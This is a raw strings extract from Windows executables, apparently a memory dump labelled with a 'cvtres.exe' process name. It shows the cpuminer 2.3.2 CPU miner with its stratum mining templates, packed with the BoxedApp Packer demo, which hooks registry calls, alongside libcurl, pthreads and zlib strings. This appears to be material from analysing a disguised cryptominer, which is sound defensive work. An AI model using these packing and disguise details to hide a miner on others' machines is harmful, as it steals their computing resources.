_curl_multi_init
_Curl_unencode_cleanup
_Curl_unencode_gzip_write
_Curl_unencode_deflate_write
_curl_share_init
_Curl_share_lock
_Curl_share_unlock
_curl_share_cleanup
_curl_share_setopt
_Curl_digest_cleanup
_Curl_output_digest
_Curl_input_digest
_Curl_MD5_init
_Curl_MD5_update
_Curl_MD5_final
_Curl_md5it
_Curl_rand
_Curl_srand
_Curl_inet_pton
_curl_easy_strerror
_curl_multi_strerror
_curl_share_strerror
_Curl_strerror
_Curl_ipvalid
_Curl_ipv4_resolve_r
_Curl_getaddrinfo
_Curl_set_dns_servers
_Curl_inet_ntop
_Curl_gmtime
_curl_getdate
_Curl_wait_ms
_Curl_poll
_Curl_socket_check
_Curl_clone_ssl_config
_Curl_free_ssl_config
_Curl_ssl_config_matches
_Curl_splay
_Curl_splayinsert
_KEY_NOTUSED.17658
_Curl_splaygetbest
_Curl_splayremovebyaddr
_Curl_blockread_all
_Curl_SOCKS5
_Curl_SOCKS4
_Curl_raw_toupper
_Curl_raw_equal
_Curl_raw_nequal
_Curl_strntoupper
_Curl_freeaddrinfo
_Curl_he2ai
_Curl_ip2addr
_Curl_str2addr
_curl_slist_append
_curl_slist_free_all
_Curl_slist_duplicate
_curlx_nonblock
_Curl_memrchr
_curlx_ultous
_curlx_ultouc
_curlx_ultosi
_curlx_uztosi
_curlx_uztoul
_curlx_uztoui
_curlx_sltosi
_curlx_sltoui
_curlx_sltous
_curlx_uztosz
_curlx_sotouz
_curlx_sztosi
_curlx_sitouz
_curlx_sktosi
_curlx_sitosk
_Curl_HMAC_init
_Curl_HMAC_update
_Curl_HMAC_final
_Curl_gethostname
http_negotiate_sspi.c
_Curl_proxyCONNECT
_Curl_proxy_connect
_Curl_sasl_cleanup
_Curl_sasl_create_login_message
_sasl_digest_get_key_value
_Curl_sasl_create_digest_md5_message
_Curl_sasl_create_cram_md5_message
_Curl_sasl_create_plain_message
_Curl_bundle_remove_conn
_Curl_bundle_add_conn
_Curl_bundle_destroy
_Curl_bundle_create
_Curl_conncache_find_first_connection
_Curl_conncache_foreach
_Curl_conncache_remove_conn
_Curl_conncache_find_bundle
_Curl_conncache_add_conn
_Curl_conncache_destroy
_Curl_conncache_init
_print_pipeline
_Curl_pipeline_set_server_blacklist
_Curl_pipeline_server_blacklisted
_Curl_pipeline_set_site_blacklist
_Curl_pipeline_site_blacklisted
_Curl_move_handle_from_send_to_recv_pipe
_Curl_add_handle_to_pipeline
_Curl_pipeline_penalized
.weak.__Jv_RegisterClasses.___gcc_register_frame
__libmsvcrt_a_iname
_Curl_handler_http
___crt_xl_start__
___crt_xi_start__
___crt_xi_end__
_Curl_crealloc
_Curl_cfree
_Curl_HMAC_MD5
_Curl_wkday
___crt_xp_start__
_Curl_handler_file
___crt_xp_end__
__head_libmsvcrt_a
_Curl_ccalloc
___crt_xc_end__
___crt_xc_start__
_Curl_DIGEST_MD5
_Curl_cmalloc
_Curl_month
_Curl_cstrdup
___crt_xt_start__
_Curl_cwcsdup
___crt_xt_end__
_Curl_ack_eintr
0`.data
0@.bss
%XQIb
%dQIb
%DQIb
%xQIb
libgcc_s_dw2-1.dll
\QUSEREX.DLL
pthread_key_create
pthread_key_delete
7(8.898?8
_CRT_MT
___w64_mingwthr_add_key_dtor
___w64_mingwthr_remove_key_dtor
__mingwthr_key_t
__mingwthr_key
GNU C 4.5.2
../mingw/dllcrt1.c
C:\MinGW\msys\1.0\src\mingwrt
-DllMainCRTStartup@12
__report_error
../mingw/crtst.c
__mingwthr_run_key_dtors
keyp
new_key
prev_key
cur_key
key_dtor_list
c:/mingw/bin/../lib/gcc/mingw32/4.5.2/include
crtst.c
cygming-crtbegin.c
.tls$AAA
.tls$ZZZ
.CRT$XLA
.CRT$XLZ
.CRT$XLC
.CRT$XLD
.CRT$XDA
.CRT$XDZ
.idata$6N
.idata$6j
.idata$62
.idata$6V
.idata$6~
.idata$6*
.idata$6f
.idata$6@
.idata$6>
cygming-crtend.c
__CRT_MT
.eh_frame
.debug_pubtypes
.debug_str
.debug_ranges
_pthread_key_create
_pthread_key_delete
_ptw32_processTerminate.part.1
_pthread_join
___report_error
___mingwthr_run_key_dtors
_key_dtor_list
____w64_mingwthr_add_key_dtor
____w64_mingwthr_remove_key_dtor
.text.startup
.ctors.65535
.weak.___register_frame_info.___gcc_register_frame
_ptw32_selfThreadKey
_ptw32_cleanupKey
.weak.___deregister_frame_info.___gcc_register_frame
deflate 1.2.8 Copyright 1995-2013 Jean-loup Gailly and Mark Adler
b
inflate 1.2.8 Copyright 1995-2013 Mark Adler
%9X9i9z9
"@"@"@"@
This EXE is created by the demo version of BoxedApp Packer
Visit our web-site at: http://boxedapp.com/boxedapppacker/order.html
WBoxedAppLog_%d.txt
BoxedAppVar:ExeFileName
BoxedAppVar:ExeFileExtension
BoxedAppVar:ExeFileNameWithoutExtension
BoxedAppVar:ExeFullPath
BoxedAppVar:OldCmdLine
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_CURRENT_CONFIG
HKEY_USERS
%s\%s
%s\winsxs\tempBxDir\virtualAsm
:\tempManifest.manifest
%s_%.8x_%.8x_%.8x
\KernelBase.dll
\.NETFramework\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
%d-%d-%p
:\TLSSupport310D39B571B74d36B95451DD240D8758
",BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
\rundll32.exe"
DotNetAppDomainManager.CManagedHost
BoxedAppSDK_AppDomainManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=ef07ce3257ee81c1
DotNetAppDomainManager.CAppDomainManager
.config
.manifest
",BoxedAppSDK_AttachMixedBitnessProcessHelper
Attempt to launch not executable file:
Unable to find appropriate template exe
comdlg32.dll
\dllhost.exe
hh.exe
find.exe
help.exe
winver.exe
regsvr32.exe
dllhost.exe
ntvdm.exe
tcpsvcs.exe
mpr.dll
Wadvapi32.dll
sxs.dll
Obtain a full version, purchase a license at http://boxedapp.com/boxedappsdk/order.html
%s_%.8x_%.8x
%s_%.8x
boxedapp_msg_process
boxedapp_event_newmsg
boxedapp_msg_global
bxsdk64.dll
:\{9019ACD6-BC11-4308-8C49-92E0601DF38D}\temp\
\DosDevices\pipe\
\Device\NamedPipe\
\??\pipe\
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Gre_Initialize
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontMapper
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontDpi
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony\Locations
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PreviewHandlers
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates
\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates
publicKeyToken
Software\Microsoft\Windows\CurrentVersion\SideBySide\Winners\
!"#$%&'()* ,-./0123456789:;<=>?@
3, 3, 5, 0
BoxedApp, BoxedApp SDK, BoxedApp Packer, BoxedApp.com and some others are trademarks (some of them are registered) of Virtualization Technologies Ltd.
BoxedAppSDK.dll
\libcurl-4.dll
!"#$%&'()* ,-./0123456789:
pthreadgc2.dll
\pthreadgc2.dll
POSIX Threads for Windows LPGL
2, 9, 1, 0
pthreadGC2.DLL
http://sourceware.org/pthreads-win32/
\zlib1.dll
For more information visit http://www.zlib.net/

cvtres.exe_3500_rwx_00400000_00177000:




.text
``.data
.rdata
`@.bss
.idata
.main
.bxpck
66665\\\\
\\\\5\\\\
666656666
libgcj-12.dll
JSON decode of %s failed
http://
https://
stratum tcp://
http://%s
cpuminer 2.3.2
accepted: %lu/%lu (%.2f%%), %s khash/s %s
DEBUG: reject reason: %s
DEBUG: job_id='%s' extranonce2=%s ntime=x
Starting Stratum on %s
...terminating workio thread
...retry after %d seconds
JSON decode failed(%d): %s
{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}
{"method": "getwork", "params": [ "%s" ], "id":1}
JSON key '%s' not found
JSON key '%s' is not a string
CURL initialization failed
%s%s%s
Long-polling activated for %s
json_rpc_call failed, retry after %d seconds
DEBUG: got new work in %d ms
Binding thread %d to cpu %d
thread %d: %lu hashes, %s khash/s
Total: %s khash/s
work retrieval failed, exiting mining thread %d
http://127.0.0.1:9332/
%s: unsupported non-option argument '%s'
JSON option %s invalid
https:
%s:%s
thread %d create failed
%d miner threads started, using '%s' algorithm.
cert
userpass
-o, --url=URL URL of mining server (default: http://127.0.0.1:9332/)
-O, --userpass=U:P username:password pair for mining server
-p, --pass=PASSWORD password for mining server
--cert=FILE certificate for mining server using SSL
-x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy
--no-longpoll disable X-Long-Polling support
--no-stratum disable X-Stratum support
[%d-d-d d:d:d] %s
User-Agent: cpuminer/2.3.2
HTTP request failed: %s
JSON-RPC call failed: %s
hex2bin failed on '%s'
DEBUG: %s
Hash: %s
Target: %s
http%s
http_proxy
Stratum connection failed: %s
{"id": 1, "method": "mining.subscribe", "params": []}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}
mining.notify
Stratum session id: %s
mining.set_difficulty
client.reconnect
stratum tcp://%s:%d
Server requested reconnection to %s
client.get_version
cpuminer/2.3.2
client.show_message
MESSAGE FROM SERVER: %s
{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}
%s near '%s'
%s near end of file
unable to decode byte 0x%x at position %d
control character 0x%x
invalid Unicode '\uX\uX'
invalid Unicode '\uX'
end == saved_text   lex->saved_text.length
unable to open %s: %s
\ux
\ux\ux
mingwm10.dll
__mingwthr_remove_key_dtor
__mingwthr_key_dtor
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
%s: option requires an argument -- %c
%s: unrecognised option `-%s'
%s: invalid option -- %c
option `%s%s' doesn't accept an argument
option `%s%s' requires an argument
%s: option `%s' is ambiguous
%s: unrecognised option `%s'
0123456789
1399780752 312
curl_easy_cleanup
curl_easy_init
curl_easy_perform
curl_easy_reset
curl_easy_setopt
curl_global_init
curl_slist_append
curl_slist_free_all
curl_version
pthread_join
libcurl-4.dll
KERNEL32.dll
msvcrt.dll
pthreadGC2.dll
WS2_32.dll
zcÁ
KERNEL32.DLL
USER32.DLL
EnumChildWindows
kernel32.dll
ntdll.dll
mscoree.dll
.mixcrt
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
operator
USER32.dll
SHELL32.dll
OLEAUT32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
EXEPackerHost32.exe
?m_IID@@3RCU_IMAGE_IMPORT_DESCRIPTOR@@C
`.rdata
@.data
.rsrc
@.reloc
.\BoxedAppSDK_StaticLib.cpp
BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
BoxedAppSDK_AttachMixedBitnessProcessHelper
BoxedAppSDK_EnumVirtualRegKeysA
BoxedAppSDK_EnumVirtualRegKeysW
BoxedAppSDK_ExecuteDotNetApplicationA
BoxedAppSDK_ExecuteDotNetApplicationW
BoxedAppSDK_DeleteVirtualRegKeyByHandle
BoxedAppSDK_DeleteVirtualRegKeyW
BoxedAppSDK_DeleteVirtualRegKeyA
BoxedAppSDK_CreateVirtualRegKeyW
BoxedAppSDK_CreateVirtualRegKeyA
C62E2B35-E4B3-4019-A7C4-F50AC7F78470
Get exe dir...
Get exe dir...done
Get the extension...done
Get current dir...done
Get old args...done
The command line overriding: %s
GetCommandLineW preparing to intercept...done
GetCommandLineA preparing to intercept...done
The embedding BoxedApp into child processes: %s
GetWindowsDirectoryW
RegCreateKeyExW
RegDeleteKeyW
RegCloseKey
ADVAPI32.dll
ole32.dll
EXEPackerStub32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\exepackerstub\!output\exepackerstub32\release_full\EXEPackerStub32.pdb
l$D9.tO
FTPSW
u$D
TryCreateProcessForVirtualEXE, template exe found:
CBoxedAppCore::My_NtDeleteKey, KeyHandle = 0x
CBoxedAppCore::My_NtEnumerateValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtFlushKey, KeyHandle = 0x
CBoxedAppCore::My_NtNotifyChangeKey, KeyHandle = 0x
CBoxedAppCore::My_NtQueryKey, KeyHandle =
CBoxedAppCore::My_NtQueryMultipleValueKey, KeyHandle =
CBoxedAppCore::My_NtSetInformationKey, KeyHandle = 0x
KernelBase.dll
0x%x%x
CBoxedAppCore::My_NtCreateKey, ObjectAttributes = '
CBoxedAppCore::My_NtDeleteValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtLoadKey, DestinationKeyName = '
CBoxedAppCore::My_NtQueryValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtReplaceKey, BackupHiveFileName = '
CBoxedAppCore::My_NtSetValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtUnloadKey, DestinationKeyName = '
CBoxedAppCore::My_NtRenameKey, KeyHandle =
BoxedAppSDK::CBoxedAppCore::TryCreateProcessForVirtualEXE_AnotherBitnessPart
: Can't create process of rundll32.exe, last error =
{4F95F74C-9713-4181-ACDD-8A50195FBC0F}
BoxedAppSDK::CBoxedAppCore::AttachToProcess_WithProcessHelper
BoxedAppSDK::CBoxedAppCore::AttachMixedBitnessProcessHelper
CBoxedAppCore::My_NtLoadKey2, DestinationKeyName = '
CBoxedAppCore::My_NtRestoreKey, KeyHandle = 0x
CBoxedAppCore::My_NtSaveKey, KeyHandle = 0x
:\VirtualDllWithSameImport.dll
:\VirtualDllWithTls.dll
VirtualDllWithTls.dll
VirtualDllWithSameImport.dll
WinExec
advapi32.dll
NtRenameKey
NtUnloadKey
NtSetValueKey
NtSetInformationKey
NtSaveKey
NtRestoreKey
NtReplaceKey
NtQueryValueKey
NtQueryMultipleValueKey
NtQueryKey
NtOpenKeyEx
NtOpenKey
NtNotifyChangeKey
NtLoadKey2
NtLoadKey
NtFlushKey
NtEnumerateValueKey
NtEnumerateKey
NtDeleteValueKey
NtDeleteKey
NtCreateKey
[BOXEDAPP][pid:%d][tid:%d][ %.2d:%.2d:%.2d.%.3d]
FILE_EXECUTE
GENERIC_EXECUTE
KEY_WOW64_64KEY
KEY_WOW64_32KEY
KEY_NOTIFY
KEY_CREATE_LINK
KEY_ENUMERATE_SUB_KEYS
KEY_CREATE_SUB_KEY
KEY_SET_VALUE
KEY_QUERY_VALUE
SECTION_MAP_EXECUTE
PAGE_EXECUTE_WRITECOPY
PAGE_EXECUTE_READWRITE
PAGE_EXECUTE_READ
PAGE_EXECUTE
STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED
STATUS_LOCAL_USER_SESSION_KEY
STATUS_NULL_LM_PASSWORD
STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE
STATUS_CARDBUS_NOT_SUPPORTED
STATUS_INVALID_PORT_ATTRIBUTES
STATUS_PORT_MESSAGE_TOO_LONG
STATUS_PORT_DISCONNECTED
STATUS_PORT_CONNECTION_REFUSED
STATUS_INVALID_PORT_HANDLE
STATUS_PORT_ALREADY_SET
STATUS_EAS_NOT_SUPPORTED
STATUS_CTL_FILE_NOT_SUPPORTED
STATUS_WRONG_PASSWORD
STATUS_ILL_FORMED_PASSWORD
STATUS_PASSWORD_RESTRICTION
STATUS_PASSWORD_EXPIRED
STATUS_FLOAT_DENORMAL_OPERAND
STATUS_FLOAT_INVALID_OPERATION
STATUS_PIPE_NOT_AVAILABLE
STATUS_INVALID_PIPE_STATE
STATUS_PIPE_BUSY
STATUS_PIPE_DISCONNECTED
STATUS_PIPE_CLOSING
STATUS_PIPE_CONNECTED
STATUS_PIPE_LISTENING
STATUS_NOT_SUPPORTED
STATUS_PIPE_EMPTY
STATUS_WRONG_PASSWORD_CORE
STATUS_PIPE_BROKEN
STATUS_DISK_OPERATION_FAILED
STATUS_KEY_DELETED
STATUS_KEY_HAS_CHILDREN
STATUS_NO_USER_SESSION_KEY
STATUS_PASSWORD_MUST_CHANGE
STATUS_PORT_UNREACHABLE
STATUS_LOGIN_TIME_RESTRICTION
STATUS_LOGIN_WKSTA_RESTRICTION
STATUS_UNSUPPORTED_COMPRESSION
STATUS_NO_USER_KEYS
STATUS_NOT_EXPORT_FORMAT
STATUS_TRANSPORT_FULL
STATUS_WMI_NOT_SUPPORTED
STATUS_SAM_NEED_BOOTKEY_PASSWORD
STATUS_SAM_NEED_BOOTKEY_FLOPPY
STATUS_STRONG_CRYPTO_NOT_SUPPORTED
STATUS_NOT_SUPPORTED_ON_SBS
STATUS_CSS_KEY_NOT_PRESENT
STATUS_CSS_KEY_NOT_ESTABLISHED
STATUS_NO_KERB_KEY
STATUS_UNSUPPORTED_PREAUTH
STATUS_PORT_NOT_SET
STATUS_INVALID_IMPORT_OF_NON_DLL
STATUS_SMARTCARD_NO_KEY_CONTAINER
STATUS_SMARTCARD_NO_CERTIFICATE
STATUS_SMARTCARD_NO_KEYSET
STATUS_SMARTCARD_CERT_REVOKED
STATUS_SMARTCARD_CERT_EXPIRED
STATUS_SXS_KEY_NOT_FOUND
STATUS_CLUSTER_JOIN_IN_PROGRESS
STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS
RegDeleteKeyExW
NtRequestWaitReplyPort
NtConnectPort
NtReplyPort
NtCompleteConnectPort
NtAcceptConnectPort
NtReplyWaitReceivePort
NtCreateWaitablePort
Imported function,
.data
It's impossible to create virtual file: parent file is virtual, but passed pBehavior is not NULL
It's impossible to create virtual file: passed pBehavior doesn't support Behavior::IVirtualFileStream
It's impossible to create virtual file: parent node is virtual, but passed pBehavior is not NULL
BoxedAppSDK::Registry::Impl::CRegistry::GetAllChildsKeys
NtEnumerateKey() returned unexpected error, status =
, RegTree::IEnumKeyNode::GetNext() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::EnumVirtualRegKeys
, RegTree::IKeyNode::EnumKeys() failed, hr =
: RegTree::IEnumKeyNode::GetNext() failed, hr =
: GetAllChildsKeys() failed, status =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryKeyInternal
: RegTree::IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetFullRegKeyPath
error, IVirtualKeyHandle_GetFullPath() returned
Invalid key information class:
KeySetHandleTagsInformation is not supported for virtual handle
KeySetDebugInformation is not supported for virtual handle
KeySetVirtualizationInformation is not supported for virtual handle
KeyControlFlagsInformation is not supported for virtual handle
KeyWow64FlagsInformation is not supported for virtual handle
We still don't process NtQueryObject / ObjectBasicInformation for virtual key handles
We still don't process NtQueryObject / ObjectTypeInformation for virtual key handles
: IVirtualKeyHandle::Rename() failed, hr =
: RegTree::IKeyNode::Remove() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtRenameKeyInternal
: RegTree::IKeyNode::AddKey() failed, hr =
: result hkey =
: IVirtualKey::CreateKey() failed, hr =
: we can't create a virtual key with its own behavior under another virtual key
: Handles::CreateVirtualKeyHandle() failed, hr =
: IVirtualKey::OpenKey() failed, hr =
: RegImpl::CreateKeyOnSharedMem() failed, hr =
: GetFullRegKeyPath() failed for the hKey =
: Handles::IVirtualKeyHandle::CreateKey() failed and returned
: passed pBehavior is not NULL, but parent key is virtual, so we can't create a key
BoxedAppSDK::Registry::Impl::CRegistry::CreateVirtualRegKey
: lpSubKey: "
BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKey
: Handles::CreateVirtualKeyHandle() failed
BoxedAppSDK::Registry::Impl::CRegistry::NtCreateKeyInternal
: SearchStartingFromRealKey() failed
: RegTree::IKeyNode::FindValue() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteValueKeyInternal
: IVirtualKeyHandle::put_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetRealKeyLastWriteTime
: NtQueryKey() failed, status =
: NtOpenKey() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::HasRealKeySubKeys
: NtEnumerateValueKey() failed when we tried to get name of the node, status =
: IKeyNode::EnumValues() failed, hr =
: Behavior::IVirtualKeyHandle::EnumKeys() failed, hr =
: Behavior::IVirtualKeyHandle::EnumValues() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateValueKeyInternal
BoxedAppSDK::Registry::Impl::CRegistry::NtOpenKeyInternal
: invalid KeyInformationClass passed:
: IVirtualKeyHandle_GetFullPath() failed, hr =
: Behavior::IEnumVirtualKey::GetNext() failed, hr =
: IVirtualKeyHandle::EnumValues() failed, hr =
: IVirtualKeyHandle::EnumKeys() failed, hr =
: IVirtualKeyHandle::get_LastWriteTime() failed, hr =
reg:NtQueryMultipleValueKey(
: IKeyNode::FindValue() failed, hr =
: IVirtualKeyHandle::get_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryValueKeyInternal
: IVirtualKeyHandle::get_ValueType() failed, hr =
reg:NtSetInformationKey(
RegTree::IKeyNode::RemoveValue() failed, hr
BoxedAppSDK::Registry::Impl::CRegistry::NtSetValueKeyInternal
reg:NtRenameKey(
RegTree::IEnumKeyNode::GetNext(), hr =
RegTree::IKeyNode::EnumKeys(), hr =
: IEnumVirtualKey::GetNext() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyInternal
reg:NtDeleteValueKey(
: NtEnumerateKey() failed when we tried to get name of the node, status =
, Behavior::IVirtualKeyHandle::get_Prop() failed, hr =
, Behavior::IVirtualKey::OpenKey() failed, hr =
: IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateKeyInternal
reg:NtEnumerateValueKey(
reg:NtQueryKey(
reg:NtQueryValueKey(
reg:NtSetValueKey(
reg:NtCreateKey(
reg:NtDeleteKey(
reg:NtEnumerateKey(
reg:NtOpenKey(
RegOpenKeyExW
RegOpenKeyW
bxsdk32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\bxsdk32.pdb
`.rsrc
v2.0.50727
BoxedAppSDK_AppDomainManager.dll
System.Security
.ctor
System.Security.Policy
System.Reflection
System.Runtime.InteropServices
System.Diagnostics
System.Runtime.CompilerServices
System.Collections
System.Security.Permissions
System.IO
DllImportAttribute
shell32.dll
lpCmdLine
1.0.0.0
$87cd9ac9-2a94-4a9b-aee1-8d25d6a19f78
D:\build_area\boxedapp_src\src\BoxedAppSolution\DotNetAppDomainManager\obj\x86\Release_Full\BoxedAppSDK_AppDomainManager.pdb
BoxedAppSDKThunk32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\BoxedAppSDKThunk32.pdb
.reloc
TLSSupport32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\TLSSupport32.pdb
9 9$9(9,909
4!40484}4
:$:,:5:::{:
?#?2?9?@?
1 1$1(1,1014181
9$=(=,=0=4=8=<=@=
6 6$6(6,6064686<6@6
1"26233'4
4 40454:4
:":2:7:>;
,1014181
8 8$8(8,8
P`.data
.edata
0@.idata
SShPi
SSh}i
purl/
j.RPj
libgcj_s.dll
Couldn't open file %s
Can't open %s for writing
Can't get the size of %s
Last-Modified: %s, d %s M d:d:d GMT
%c%c==
%c%c%c=
%c%c%c%c
%s:%d
%5[^:]:%d:%5s
Resolve %s found illegal!
Added %s:%d:%s to DNS cache
timeout on name lookup is not supported
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s
; filename="%s"
%s; boundary=%s
Content-Type: multipart/mixed, boundary=%s
Content-Type: %s
couldn't open file "%s"
--%s--
p.jpg
p.jpeg
p.txt
p.html
p.xml
#HttpOnly_
23[^;
=]=I99[^;
httponly
skipped cookie with illegal dotcount domain: %s
skipped cookie with bad tailmatch domain: %s
%s cookie %s="%s" for domain %s, path %s, expire %lld
# Netscape HTTP Cookie File
# http://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
# Fatal libcurl error
WARNING: failed to save cookies in %s
Avoided giant realloc for header (max is %d)!
HTTP/
The requested URL returned error: %d
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
%sAuthorization: Basic %s
%s auth using %s with user '%s'
Referer: %s
Accept-Encoding: %s
%s, TE
Chunky upload is not supported by HTTP 1.0
Host: %s%s%s
Host: %s%s%s:%hu
ftp://
;type=%c
Range: bytes=%s
Content-Range: bytes %s%lld/%lld
Content-Range: bytes %s/%lld
ftp://%s:%s@%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s=%s
Internal HTTP POST error!
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP request
HTTP error before end of send, stop sending
HTTP/%d.%d =
HTTP =
RTSP/%d.%d =
The requested URL returned error: %s
HTTP 1.0, assume close after body
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.0 connection set to keep alive!
[%s %s %s]
Recv failure: %s
Send failure: %s
/etc/ssl/certs/ca-certificates.crt
IDN support not present, can't parse Unicode domains
Connected to %s (%s) port %ld (#%ld)
%5[^:@]:%5[^@]
[%*45[0123456789abcdefABCDEF:.]%c
%s://%s%s%s:%hu%s%s%s
Port number too large: %lu
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
User-Agent: %s
About to connect() to %s%s port %ld (#%ld)
Curl_addHandleToPipeline: length: %d
Closing connection %d
Connection #%ld to host %s left intact
Found bundle for host %s: %p
Server doesn't support pipelining
Connection %d seems to be dead!
[^:]:%[^
:]://%[^
 malformed
:%5[^@]
Protocol %s not supported or disabled in libcurl
%s://%s
Couldn't find host %s in the _netrc file; using defaults
ftp@example.com
Found connection %d, with requests in the pipe (%d)
Re-using existing connection! (#%ld) with host %s
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
zlib/%s
7.30.0
%%X
login
password
[^?&/:]://%c
Issue another request to this URL: '%s'
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
No URL set!
seek callback returned error %d
the ioctl callback returned %d
ioctl callback returned error %d
operation aborted by callback
Rewinding stream by : %zd bytes on url %s (zero-length body)
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
HTTP server doesn't seem to support byte ranges. Cannot resume.
Problem (%d) in the Chunked-Encoded data
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Unrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Operation timed out after %ld milliseconds with %lld bytes received
pUnrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.
psa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Could not set TCP_NODELAY: %s
TCP_NODELAY set
Failed to set SO_KEEPALIVE on fd %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Couldn't bind to interface '%s'
Local Interface %s is ip %s using address family %i
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
Local port: %hu
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
Failed to connect to %s: %s
couldn't connect to %s at %s:%d
getpeername() failed with errno %d: %s
